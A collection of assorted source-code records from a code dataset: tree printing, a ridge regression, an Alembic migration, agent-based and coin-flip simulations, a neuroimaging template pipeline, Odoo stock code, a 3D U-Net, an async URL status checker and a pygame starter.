stdout\n\nclass Node(object):\n\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef show(node):\n cur_level = 0\n nodes = deque()\n nodes.append((node, 0))\n while nodes:\n node, level = nodes.popleft()\n if level != cur_level:\n assert level == cur_level + 1\n cur_level = level\n stdout.write('\\n')\n stdout.write('%s' % (node.val, ))\n if node.left:\n nodes.append((node.left, level + 1))\n if node.right:\n nodes.append((node.right, 
level + 1))\n    stdout.write('\\n')\n\nif __name__ == '__main__':\n    n5 = Node(5)\n    n4 = Node(4)\n    n3 = Node(3, n5)\n    n2 = Node(2, n3, n4)\n    n1 = Node(1, n2)\n    show(n1)\n","sub_path":"lang/c/tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507095572","text":"# Programmatically create a text file and write into it a set of numbers separated by spaces.\n# The program must compute the sum of the numbers in the file and print it to the screen.\n\nimport random\n\nn = (random.random() for _ in range(0, random.randrange(1, 10)))\nwith open(r'out5.txt', 'w') as f_out:\n    print(*n, file=f_out)\n\nwith open(r'out5.txt', 'r') as f_out:\n    print(sum((float(i) for i in f_out.readline().split())))\n","sub_path":"ДЗ Урок 5/main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352889323","text":"\"\"\"empty message\n\nRevision ID: c9468bbd7405\nRevises: 327b13989ec1\nCreate Date: 2021-03-30 10:14:00.234627\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c9468bbd7405'\ndown_revision = '327b13989ec1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    with op.batch_alter_table('answer', schema=None) as batch_op:\n        batch_op.add_column(sa.Column('modify_date', sa.DateTime(), nullable=True))\n\n    with op.batch_alter_table('question', schema=None) as batch_op:\n        batch_op.add_column(sa.Column('modify_date', sa.DateTime(), nullable=True))\n\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    with op.batch_alter_table('question', schema=None) as batch_op:\n        batch_op.drop_column('modify_date')\n\n    with op.batch_alter_table('answer', schema=None) as batch_op:\n        batch_op.drop_column('modify_date')\n\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/c9468bbd7405_.py","file_name":"c9468bbd7405_.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319217566","text":"\"\"\"\nmain.py\n\nProject: \nThe Effect of Prey Size on Emergent Predator Group Sizes: An Agent-Based Model\n\nGroup5 (A. Lind, R. Colley, S. de Groot, V. Botha, N. El Mahjoubi)\nAgent-Based-Modeling (M. Lee and D. 
Roy)\nUniversity of Amsterdam\n\nThis file contains the script to run to model in the command line \n\nUsage: Set the parameters in the parameters.py file \n - just run: python main.py\n - run and output data: python main.py data\n\nNote: see README.md for required packages\n\"\"\"\n\nfrom agents import *\nfrom helpers import *\nfrom model import *\nfrom parameters import *\n\nimport matplotlib.backends.backend_pdf\nimport pandas as pd\nimport sys \n\n\ndef main():\n \"\"\"\n Initializes and runs the model with parameters from the parameters.py file\n \"\"\"\n\n # determine if data needs to be outputed \n output_data = False \n\n if len(sys.argv) > 2:\n sys.stdout.write(\"Usage: \\n - just run: python model.py\\n \"\n \"- run and output data: python model.py data\\n\")\n sys.exit(1)\n\n elif len(sys.argv) == 2:\n if sys.argv[1] == \"data\":\n output_data = True\n else:\n sys.stdout.write(\"Usage: \\n - just run: python model.py\\n \"\n \"- run and output data: python model.py data\\n\")\n sys.exit(1)\n\n # initialize with parameters from parameters.py\n model = PredatorPrey(height = height,\n width = width,\n initial_prey = initial_prey,\n initial_predators= initial_predators,\n carrying_capacity = carrying_capacity, \n prey_reproduction_chance= prey_reproduction_chance,\n predator_death_chance = predator_death_chance,\n prey_value = prey_value,\n defection_gain = defection_gain,\n hunting_ability = hunting_ability, \n memory_window = memory_window,\n ratio_MT = ratio_MT, \n ratio_MC = ratio_MC)\n \n # run model\n model.run_model(progress_indicator = True)\n\n\n data = model.datacollector.get_model_vars_dataframe()\n\n # print the model output of the last time step\n print_modeloutput_at_last_timestep(data)\n\n if output_data:\n output_model_data(data)\n\ndef print_modeloutput_at_last_timestep(data):\n\t\"\"\"\n\tprints the model output of the last time step\n Args:\n data (pandas Dataframe): Dataframe containing model \n output from datacollector\n\t\"\"\"\n\n\n\tlast_data = data.tail(1)\n\n\tprint(\"\\nMODEL OUTPUT OF LAST TIME STEP:\")\n\tfor col in last_data:\n\t\t# print(col)\n\t\tprint(col + \": \" + last_data[col].to_string(index=False))\n\n\ndef output_model_data(data): \n \"\"\"\n Saves model output\n - csv file of data ('data.csv')\n - pdf containing all plots ('plots.pdf':\n * nr prey and predators\n * ratio prey/predator\n * ratio cooperators\n * average group size\n * counts of group sizes \n\n Args:\n data (pandas Dataframe): Dataframe containing model \n output from datacollector\n \"\"\"\n\n\n # save model data in csv \n data.to_csv(\"data.csv\")\n\n # plot model output \n plot1 = data[['Prey','Predator']].plot()\n plot1.set_xlabel(\"Time steps\")\n fig1 = plot1.get_figure()\n\n plot2 = data[['Ratio Prey/Predator']].plot()\n plot2.set_xlabel(\"Time steps\")\n fig2 = plot2.get_figure()\n\n plot3 = data[['Ratio cooperators']].plot()\n plot3.set_xlabel(\"Time steps\")\n fig3 = plot3.get_figure()\n\n\n plot4 = data[['Average group size']].plot()\n plot4.set_xlabel(\"Time steps\")\n fig4 = plot4.get_figure()\n\n\n plot5 = data[['nr groups of size 1',\n 'nr groups of size 2', \n 'nr groups of size 3',\n 'nr groups of size 4',\n 'nr groups of size 5',\n 'nr groups of size 6',\n 'nr groups of size 7',\n 'nr groups of size 8',\n 'nr groups of size 9',\n 'nr groups of size 10',\n 'nr groups of size 11',\n 'nr groups of size 12',\n 'nr groups of size 13',\n 'nr groups of size 14',\n 'nr groups of size 15',\n 'nr groups of size 16',\n 'nr groups of size 17',\n 'nr groups of size 18',\n 
'nr groups of size 19',\n                  'nr groups of size 20',\n                  'nr groups of size >=21']].plot()\n    plot5.set_xlabel(\"Time steps\")\n    plot5.legend(loc=2, prop={'size': 6})\n    fig5 = plot5.get_figure()\n\n    # save all plots in one pdf file\n    pdf = matplotlib.backends.backend_pdf.PdfPages(\"plots.pdf\")\n    for fig in range(1, 6):\n        pdf.savefig( fig )\n    pdf.close()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"265469960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\nimport random\n\n# load training data input\ndf = pd.read_csv('./1-prostate-training-data.csv')\nX_train = []\ny_train = []\nnum_record = df['lcavol'].count()\nvect_input = []\n\nfor i in range(num_record):\n    vect_input.append(np.array(df.iloc[[i]])[0].tolist())\n\n# Build X_train and y_train\nfor i in range(num_record):\n    X_train.append(vect_input[i][:8])\n    y_train.append(vect_input[i][8]) \n\n# Split the data into two parts: training and validation\nX_valid = X_train[180:]\nX_training = X_train[:180]\ny_valid = y_train[180:]\ny_training = y_train[:180]\n\n# Build X bar (with a bias column of ones) and y\nX_training = np.asarray(X_training)\nX_valid = np.asarray(X_valid)\none_train = np.ones((X_training.shape[0], 1))\none_valid = np.ones((X_valid.shape[0], 1))\nX_valid = np.concatenate((one_valid, X_valid), axis = 1)\nX_training = np.concatenate((one_train, X_training), axis = 1)\ny_training = np.asarray(y_training).T\ny_valid = np.asarray(y_valid).T\n\n# Ridge regression weights w (closed-form solution)\nm = np.dot(X_training.T, X_training)\nn = np.dot(X_training.T, y_training)\nI = np.eye(len(X_training[0]))\n\nlda = np.arange(0.8,2,0.001) # grid of candidate lambda values\nw = []\nres = []\nres_valid = []\nfor i in range(len(lda)):\n    sum_in = m+lda[i]*I\n    w.append(np.dot(np.linalg.pinv(sum_in), n))\n    res.append(np.dot(X_training, w[i]).tolist())\n    res_valid.append(np.dot(X_valid, w[i]).tolist())\n\ndef sum_loss(x):\n    sum_loss = 0\n    for i in x:\n        sum_loss += i*i\n    return sum_loss\n\nminimum = 100000000\nindex = -1\nfor i in range(len(lda)):\n    temp = res_valid[i] - y_valid\n    if(minimum > sum_loss(temp)):\n        minimum = sum_loss(temp)\n        index = i\nprint(\"w computed : \\n\", w[index])\nres[index].extend(res_valid[index]) \nprint('\\n The best value of lambda is: ', lda[index])\n\n# Compute predictions for the test data using w[index]\n# Read the test file\ndf_test = pd.read_csv('20141943-test.csv',header=None)\nn_test = len(df_test.index)\nx_test = []\none_test = np.ones((n_test, 1))\n\nfor i in range(n_test):\n    x_test.append(np.asarray(df_test.iloc[[i]])[0][:8])\n\nx_test = np.asarray(x_test)\nx_test = np.concatenate((one_test, x_test), axis = 1)\npredict = np.dot(x_test, w[index])\nprint('Predict:',predict)\n# Save predictions to csv\ndf_test.iloc[5:,8] = predict[5:]\ndf_test.to_csv('20141943.csv', sep=',', encoding='utf-8', index = False,header=False)\n","sub_path":"data/final_responses_2/IT4866_20141943/RidgeRegression.py","file_name":"RidgeRegression.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"27597091","text":"import nipype.pipeline.engine as pe\nimport nipype.interfaces.utility as util\nimport nipype.interfaces.io as nio\nimport nipype.interfaces.ants as ants\nimport nipype.interfaces.freesurfer as fs\nimport nipype.interfaces.fsl as fsl\nfrom nipype.workflows.smri.ants.antsRegistrationBuildTemplate 
import antsRegistrationTemplateBuildSingleIterationWF\nimport os\nfrom variables import workingdir, freesurferdir, subjects\n\n\ndef create_custom_template(name=\"create_custom_template\", n_iterations = 6):\n tbuilder = pe.Workflow(name=name)\n inputspec = pe.Node(util.IdentityInterface(fields=[\"t1_volumes\"]), name=\"inputspec\")\n \n N4biasfield = pe.MapNode(ants.N4BiasFieldCorrection(), name=\"N4biasfield\", iterfield=['input_image'])\n N4biasfield.inputs.bspline_fitting_distance = 300\n N4biasfield.inputs.shrink_factor = 3\n N4biasfield.inputs.n_iterations = [50,50,30,20]\n N4biasfield.inputs.convergence_threshold = 1e-6\n N4biasfield.inputs.num_threads = 1\n \n tbuilder.connect(inputspec, \"t1_volumes\", N4biasfield, \"input_image\")\n# tbuilder.connect(inputspec, \"masks\", N4biasfield, \"mask_image\")\n \n initAvg = pe.Node(interface=ants.AverageImages(), name ='initAvg')\n initAvg.inputs.dimension = 3\n initAvg.inputs.normalize = True\n\n tbuilder.connect(N4biasfield, \"output_image\", initAvg, \"images\")\n \n# sumMask = pe.Node(interface=ants.AverageImages(), name ='sumMask')\n# sumMask.inputs.dimension = 3\n# sumMask.inputs.normalize = False\n\n# tbuilder.connect(inputspec, \"masks\", sumMask, \"images\")\n \n prev_step_output = (initAvg, 'output_average_image')\n \n def make_dict(l):\n out = []\n for i in l:\n out.append({'T1':i})\n return out\n \n for i in range(n_iterations):\n buildTemplateIteration = antsRegistrationTemplateBuildSingleIterationWF('iteration%d'%(i+1))\n BeginANTS = buildTemplateIteration.get_node(\"BeginANTS\")\n BeginANTS.inputs.num_threads = 1\n #BeginANTS.plugin_args = {'submit_specs': 'request_memory = 6000\\nrequest_cpus = 32\\n'}\n\n tbuilder.connect(prev_step_output[0], prev_step_output[1], buildTemplateIteration, 'inputspec.fixed_image')\n# tbuilder.connect(sumMask,\"output_average_image\", BeginANTS, 'fixed_image_mask')\n# tbuilder.connect(inputspec, \"masks\", BeginANTS, 'moving_image_mask')\n buildTemplateIteration.inputs.inputspec.interpolationMapping = {'T1':'Linear'}\n buildTemplateIteration.inputs.inputspec.registrationImageTypes = ['T1']\n \n tbuilder.connect(N4biasfield, (\"output_image\", make_dict), buildTemplateIteration, 'inputspec.ListOfImagesDictionaries')\n \n prev_step_output = (buildTemplateIteration, 'outputspec.template')\n \n return tbuilder\n\nif __name__ == '__main__':\n wf = pe.Workflow(name=\"main_workflow\")\n wf.base_dir = os.path.join(workingdir, \"ants_template\")\n wf.config['execution']['crashdump_dir'] = wf.base_dir + \"/crash_files\"\n \n datagrabber = pe.MapNode(nio.FreeSurferSource(), \n name=\"datagrabber\",\n overwrite=False,\n iterfield=['subject_id'])\n datagrabber.inputs.subjects_dir = freesurferdir\n datagrabber.inputs.subject_id = subjects\n \n threshold = pe.MapNode(fs.Binarize(min=0.5, out_type='nii.gz', dilate = 1),\n iterfield=['in_file'],\n name='threshold')\n \n def get_aparc_aseg(files):\n out_l = []\n for l in files:\n for name in l:\n if 'aparc+aseg' in name:\n out_l.append(name)\n break\n if out_l:\n return out_l\n else:\n raise ValueError('aparc+aseg.mgz not found')\n \n wf.connect([(datagrabber, threshold, [(('aparc_aseg', get_aparc_aseg), 'in_file')])])\n \n mask = pe.MapNode(fs.ApplyMask(out_file='brain.nii.gz'), iterfield=[\"in_file\", 'mask_file'], name=\"mask\")\n wf.connect([(datagrabber, mask, [('orig', 'in_file')]),\n (threshold, mask, [('binary_file', 'mask_file')])])\n \n template_wf = create_custom_template()\n \n wf.connect(mask, \"out_file\", template_wf, \"inputspec.t1_volumes\")\n 
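# (added, hedged) wf.run(plugin=\"Condor\") below assumes an HTCondor cluster is\n    # available; for a quick local test run, nipype's MultiProc plugin is a common\n    # alternative, e.g. wf.run(plugin=\"MultiProc\", plugin_args={\"n_procs\": 4})\n    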
#wf.connect(threshold, \"binary_file\", template_wf, \"inputspec.masks\")\n \n wf.write_graph()\n wf.run(plugin=\"Condor\")\n","sub_path":"src/enhanced_nki/create_custom_template.py","file_name":"create_custom_template.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282656426","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nimport math\n\nimport numpy as np\n\ntorch.manual_seed(0)\n\n\"\"\"\nThis code is based in this article - U-Net: Convolutional Networks for Biomedical Image Segmentation - https://arxiv.org/pdf/1505.04597.pdf\n\"\"\"\n\n\nclass UNet3D(nn.Module):\n def __init__(self, in_channels, out_channels, init_depth):\n super().__init__()\n assert in_channels >= 1, \"in_channels must be greater than 0\"\n assert out_channels >= 1, \"out_channels must be greater than 0\"\n assert init_depth >= 1, \"init_depth must be greater than 0\"\n # Encoder part\n self.encoder_1 = self.layers_block(in_channels, init_depth)\n self.encoder_maxpool_1 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_2 = self.layers_block(1*init_depth, 2*init_depth)\n self.encoder_maxpool_2 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_3 = self.layers_block(2*init_depth, 4*init_depth)\n self.encoder_maxpool_3 = nn.MaxPool3d(kernel_size=2, stride=2)\n self.encoder_4 = self.layers_block(4*init_depth, 8*init_depth)\n self.encoder_maxpool_4 = nn.MaxPool3d(kernel_size=2, stride=2)\n # Bottleneck part\n self.encoder_5 = self.layers_block(\n 8*init_depth, 16*init_depth) # bottleneck\n # Decoder part\n self.decoder_1 = self.layers_block(16*init_depth, 8*init_depth)\n self.decoder_upsampling_1 = nn.ConvTranspose3d(\n in_channels=16*init_depth, out_channels=8*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_2 = self.layers_block(8*init_depth, 4*init_depth)\n self.decoder_upsampling_2 = nn.ConvTranspose3d(\n in_channels=8*init_depth, out_channels=4*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_3 = self.layers_block(4*init_depth, 2*init_depth)\n self.decoder_upsampling_3 = nn.ConvTranspose3d(\n in_channels=4*init_depth, out_channels=2*init_depth, kernel_size=2, stride=2, padding=0)\n self.decoder_4 = self.layers_block(2*init_depth, init_depth)\n self.decoder_upsampling_4 = nn.ConvTranspose3d(\n in_channels=2*init_depth, out_channels=1*init_depth, kernel_size=2, stride=2, padding=0)\n # Output\n self.output = nn.Conv3d(\n in_channels=init_depth, out_channels=out_channels, kernel_size=1, stride=1)\n\n @staticmethod\n def layers_block(in_channels, out_channels):\n \"\"\"\n This static method create a convolutional block useful for the U-Net implementation\n \"\"\"\n return nn.Sequential(nn.Conv3d(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),\n \n nn.InstanceNorm3d(num_features=out_channels),\n nn.ReLU(),\n nn.Conv3d(\n in_channels=out_channels, out_channels=out_channels, kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm3d(num_features=out_channels),\n nn.ReLU()\n )\n\n @staticmethod\n def calculate_pad(x_1, x_2):\n padding_x = np.uint8(x_1.shape[2] - x_2.shape[2])\n padding_y = np.uint8(x_1.shape[3] - x_2.shape[3])\n padding_z = np.uint8(x_1.shape[4] - x_2.shape[4])\n first_dim_x = math.floor(padding_x/2)\n second_dim_x = padding_x - first_dim_x\n first_dim_y = math.floor(padding_y/2)\n second_dim_y = padding_y - first_dim_y\n first_dim_z = math.floor(padding_z/2)\n second_dim_z = padding_z - 
first_dim_z\n        # F.pad pads the last spatial dimension first, so the tuple is\n        # (W_left, W_right, H_left, H_right, D_left, D_right)\n        return F.pad(x_2, (first_dim_z, second_dim_z, first_dim_y, second_dim_y, first_dim_x, second_dim_x))\n\n    def forward(self, x):\n        #assert x.shape[2] % 2 == 0 and x.shape[3] % 2 == 0, \"The image input dimensions must be divisible by 2\"\n        encoder_1 = self.encoder_1(x)\n        encoder_2 = self.encoder_2(self.encoder_maxpool_1(encoder_1))\n        encoder_3 = self.encoder_3(self.encoder_maxpool_2(encoder_2))\n        encoder_4 = self.encoder_4(self.encoder_maxpool_3(encoder_3))\n        encoder_5 = self.encoder_5(self.encoder_maxpool_4(encoder_4))\n        encoder_5 = self.calculate_pad(\n            encoder_4, self.decoder_upsampling_1(encoder_5))\n        decoder_1 = self.decoder_1(torch.cat([encoder_4, encoder_5], dim=1))\n        decoder_1 = self.calculate_pad(\n            encoder_3, self.decoder_upsampling_2(decoder_1))\n        decoder_2 = self.decoder_2(torch.cat([encoder_3, decoder_1], dim=1))\n        decoder_2 = self.calculate_pad(\n            encoder_2, self.decoder_upsampling_3(decoder_2))\n        decoder_3 = self.decoder_3(torch.cat([encoder_2, decoder_2], dim=1))\n        decoder_3 = self.calculate_pad(\n            encoder_1, self.decoder_upsampling_4(decoder_3))\n        decoder_4 = self.decoder_4(torch.cat([encoder_1, decoder_3], dim=1))\n        output = self.output(decoder_4)\n        return output\n\nif __name__ == '__main__':\n    pass\n","sub_path":"models/unet_3d.py","file_name":"unet_3d.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242916280","text":"from enum import Enum\nimport numpy as np\n\nclass coin(Enum):\n    #result of coin flip\n    HEADS = 0\n    TAILS = 1\n\nclass game(object):\n    def __init__(self, id):\n        self._id = id\n        self._coin = coin.TAILS\n        self._count_wins = 0\n        self._count_tails = 0\n        self._flip_number = 1\n        self._total_flips = 20\n        self._rnd = np.random\n        self._rnd.seed(self._id * self._flip_number)\n\n    def next_flip(self):\n        # use the previous flip as the \"if\" condition, then adjust tail and win counts for the next flip\n        if self._coin == coin.TAILS:\n            if self._rnd.random_sample() > 0.4:\n                self._coin = coin.TAILS\n                self._count_tails += 1\n\n            if self._rnd.random_sample() < 0.4:\n                if self._count_tails >= 2:\n                    self._count_wins += 1\n                self._coin = coin.HEADS\n                self._count_tails = 0\n\n        elif self._coin == coin.HEADS:\n            if self._rnd.random_sample() > 0.4:\n                self._coin = coin.TAILS\n                self._count_tails = 1\n\n            if self._rnd.random_sample() < 0.4:\n                self._coin = coin.HEADS\n                self._count_tails = 0\n\n        self._flip_number += 1\n\n    def play(self):\n        for i in range(1, self._total_flips+1):\n            self._rnd = np.random\n            self._rnd.seed(self._id * self._flip_number)\n            self.next_flip()\n\n    def reward(self):\n        self.play()\n        self._payout = -250\n        self._payout += 100*self._count_wins\n        return self._payout\n\nclass cohort:\n    # initialize empty list of players (1000 id's)\n    def __init__(self, id, numPlayers):\n        self._players = []\n        n = 1\n        while n <= numPlayers:\n            player = game(id=id * numPlayers + n)\n            self._players.append(player)\n            n += 1\n\n    def simulate(self):\n        game_rewards = []\n        for player in self._players:\n            game_rewards.append(player.reward())\n        #calculate average of all games\n        return sum(game_rewards)/len(game_rewards)\n\nestimate = cohort(id=1, numPlayers=1000)\nprint(estimate.simulate())\n","sub_path":"HW4_NO_2.py","file_name":"HW4_NO_2.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"108814859","text":"import aiohttp\nimport asyncio\nimport aiofiles\nfrom pathlib import Path\nfrom .models import 
StatusCodeField\n\n\ndef write_into_db(data):\n    p = StatusCodeField.objects.create(status=data)\n    return p\n\n\ndef write_status_codes_into_file(data):\n    with open('status.txt', 'a+') as file:\n        file.write(f'{data}\\n')\n\n\nasync def make_requests(session, url):\n    async with session.head(url, allow_redirects=False) as response:\n        if response.status == 200:\n            data = f'Server response from {url}: {response.status} OK'\n            write_status_codes_into_file(data)\n            write_into_db(data)\n\n\nasync def main(url):\n    tasks = []\n    data_folder = Path(__file__).resolve().parents[1].joinpath(\"data/new_cleaned_data.txt\")\n\n    async with aiohttp.ClientSession() as session:\n        async with aiofiles.open(data_folder, mode='r') as f:\n            async for line in f:\n                concatenated_url = url + line.strip()\n                task = asyncio.create_task(make_requests(session, concatenated_url))\n                tasks.append(task)\n            await asyncio.gather(*tasks)\n","sub_path":"main_app/async_requests.py","file_name":"async_requests.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"1409894","text":"# -*- coding: utf-8 -*-\n\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass Invoice(models.Model):\n    _inherit = 'account.invoice'\n\n    have_referral_guide = fields.Boolean('Tiene guía de remisión', default=False)\n\n\nclass ImmediateTransfer(models.TransientModel):\n    _inherit = 'stock.immediate.transfer'\n\n    @api.multi\n    def process(self):\n        \"\"\"\n        ME: Flag the invoice as having a referral guide (GR).\n        :return:\n        \"\"\"\n        result = super(ImmediateTransfer, self).process()\n        pickings = self.pick_ids.filtered(lambda x: x.is_referral_guide)\n        for picking in pickings:\n            invoice = picking.invoice_id\n            invoice.sudo().write({'have_referral_guide': True})\n        return result\n\nclass Picking(models.Model):\n    _inherit = 'stock.picking'\n\n    @api.one\n    @api.constrains('arrival_date')\n    def _check_arrival_date(self):\n        if self.arrival_date < self.scheduled_date.date():\n            raise ValidationError(_(\"Fecha de llegada no puede ser menor a la prevista.\"))\n\n    def _get_warehouse_street(self):\n        warehouse = self.picking_type_id.warehouse_id\n        if warehouse:\n            street = warehouse.partner_id.street\n            return street\n        else:\n            return 'Indefinido'\n\n    @api.onchange('is_referral_guide')\n    def _onchange_is_referral_guide(self):\n        \"\"\"\n        When the field changes, fill in default values.\n        :return:\n        \"\"\"\n        if self.is_referral_guide and self.partner_id:\n            partner = self.partner_id\n            partner_carrier = partner.property_stock_carrier\n            self.starting_address = self._get_warehouse_street()\n            self.arrival_address = partner.street\n            self.carrier_id = partner_carrier.id if partner_carrier else False\n        return {}\n\n    is_referral_guide = fields.Boolean('Guía de remisión', default=False,\n                                       copy=False,\n                                       help=\"Técnico: Campo para indicar si EGRESO de inventario genera documento tributario.\")\n    arrival_date = fields.Date('Fecha de llegada',\n                               default=fields.Date.today(),\n                               help=\"Fecha prevista de llegada del transporte a la dirección de llegada.\")\n    starting_address = fields.Char('Dirección de partida')\n    arrival_address = fields.Char('Dirección de llegada')\n    route = fields.Text('Ruta')\n\n    # TODO: not shown on the form yet\n    customs_document = fields.Char('Documento aduanero')\n    arrival_establishment = fields.Char('Código de establecimiento de llegada', size=3,\n                                        help=\"Si conoce el código de establecimiento del SRI de llegada colocarlo en campo.\")\n\n\n    # SRI\n    
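# (added note) _onchange_number below zero-pads the sequential to the 9-digit\n    # format used on SRI documents, e.g. '123' -> '000000123'\n    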
@api.onchange('number')\n    def _onchange_number(self):\n        \"\"\"\n        Zero-pad the sequential number.\n        :return:\n        \"\"\"\n        if self.number:\n            self.number = self.number.zfill(9)\n\n    @api.constrains('number')\n    def _check_reference(self):\n        \"\"\"\n        Validate that the sequential number lies within the range entered in the authorization.\n        :return:\n        \"\"\"\n        if self.number and not self.is_electronic:\n            self.sri_authorization_id.is_valid_number(int(self.number))\n\n    @api.one\n    @api.depends('point_printing_id')\n    def _compute_is_electronic(self):\n        \"\"\"\n        Kept for future electronic invoicing (F.E.)\n        implementations on this document.\n        :return:\n        \"\"\"\n        self.is_electronic = False\n\n    point_printing_id = fields.Many2one('sri.point.printing', string='Punto de impresión')\n    sri_authorization_id = fields.Many2one('sri.authorization', string='Autorización del SRI')\n    number = fields.Char('Secuencial', size=9)\n    is_electronic = fields.Boolean(string='Es electrónica?', store=True, compute='_compute_is_electronic')\n    invoice_id = fields.Many2one('account.invoice', 'Aplicado a factura')\n\n    # CARRIER\n    carrier_id = fields.Many2one('stock.carrier', 'Transportista')\n    documentation_number = fields.Char('Nº Identificación', related='carrier_id.documentation_number', readonly=True)\n    transport_plate = fields.Char('Placa de transporte', related='carrier_id.transport_plate', readonly=True)\n","sub_path":"eliterp_stock_referral_guide/models/stok_picking.py","file_name":"stok_picking.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"233256742","text":"\n# Write a program for the \"hundred coins, hundred chickens\" problem: roosters cost 5 yuan each, hens 3 yuan each, and chicks are 1 yuan for three; with 100 yuan, buy exactly 100 chickens. How many ways are there?\n# Let x be the number of roosters, y the number of hens, 100-x-y the number of chicks, and count the number of ways to buy\nx = 0\ny = 0\ncount = 0\n\nfor x in range(int(100/5)):\n\n    for y in range(int(100/3)):\n\n        if(5*x+3*y+(100-x-y)/3==100):\n\n            print(\"公鸡有\"+str(x)+\"只\"+\" 母鸡有\"+str(y)+\"只\"+\" 小鸡有\"+str((100-x-y))+\"只\")\n\n            count=count+1\n\nprint(\"一共有\"+str(count)+\"种买法\")\n\n# 公鸡有0只 母鸡有25只 小鸡有75只\n# 公鸡有4只 母鸡有18只 小鸡有78只\n# 公鸡有8只 母鸡有11只 小鸡有81只\n# 公鸡有12只 母鸡有4只 小鸡有84只\n# 一共有4种买法\n\n","sub_path":"homework4/Group3/hw4_1720372_1.py","file_name":"hw4_1720372_1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"579749895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport gam_gate as gam\nimport gam_g4 as g4\nimport math\n\n# Get Nist Material Manager\nn = g4.G4NistManager.Instance()\nprint('Nist manager', n)\n\n# http://geant4-userdoc.web.cern.ch/geant4-userdoc/UsersGuides/ForApplicationDeveloper/html/Appendix/materialNames.html\nmat = n.FindOrBuildMaterial('G4_WATER')\nprint('Mat Water', mat)\nassert mat.GetName() == 'G4_WATER'\ngcm3 = gam.g4_units('g/cm3')\nprint('Density ', mat.GetDensity(), mat.GetDensity() / gcm3)\nassert math.isclose(mat.GetDensity(), gcm3)\nprint('Elements', mat.GetElementVector())\nprint('Nb of elements', mat.GetNumberOfElements())\nassert mat.GetNumberOfElements() == 2\nelements = mat.GetElementVector()\nassert elements[0].GetSymbol() == 'H'\nassert elements[1].GetSymbol() == 'O'\n\neV = gam.g4_units('eV')\nImean = mat.GetIonisation().GetMeanExcitationEnergy()\nprint('I mean = ', Imean / eV, 'eV')\nassert math.isclose(Imean / eV, 78.0)\n\n# Another material\nmat = n.FindOrBuildMaterial('G4_TISSUE-PROPANE')\nprint('Mat 2', mat, mat.GetName())\nN = mat.GetElementVector()[2]\ngmol = gam.g4_units('g/mol')\nprint('N Z', N.GetZ())\nprint('N A', N.GetA() / gmol)\nassert N.GetZ() == 
7\nassert math.isclose(N.GetA() / gmol, 14.00676896)\n\n# n.ListMaterials('all')\n\n# simple simulation object\nprint('-' * 80)\nsim = gam.Simulation()\nprint(sim)\n\ngam.test_ok(True)\n","sub_path":"src/test003_G4Material.py","file_name":"test003_G4Material.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"485484160","text":"import sys\nimport pygame\nfrom smile import Ship\ndef run():\n pygame.init()\n screen = pygame.display.set_mode((800, 640))\n pygame.display.set_caption('First game on Python')\n ship = Ship(screen)\n bgcolor = (64, 130, 196)\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(bgcolor)\n ship.blitme()\n pygame.display.flip()\n\ndef main():\n run()\n\nif __name__ == '__main__':\n main()","sub_path":"g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35650758","text":"import os\nfrom pprint import pprint\n\nfrom bert_serving.client import BertClient\nfrom elasticsearch import Elasticsearch\nfrom flask import Flask, jsonify, render_template, request\n\nclass Searcher:\n \n def __init__(self,search_size,index_name):\n self.search_size = search_size\n os.environ['INDEX_NAME'] = index_name #'jobsearch'\n #print(os.environ['INDEX_NAME'])\n self.index_name = os.environ['INDEX_NAME']\n\n 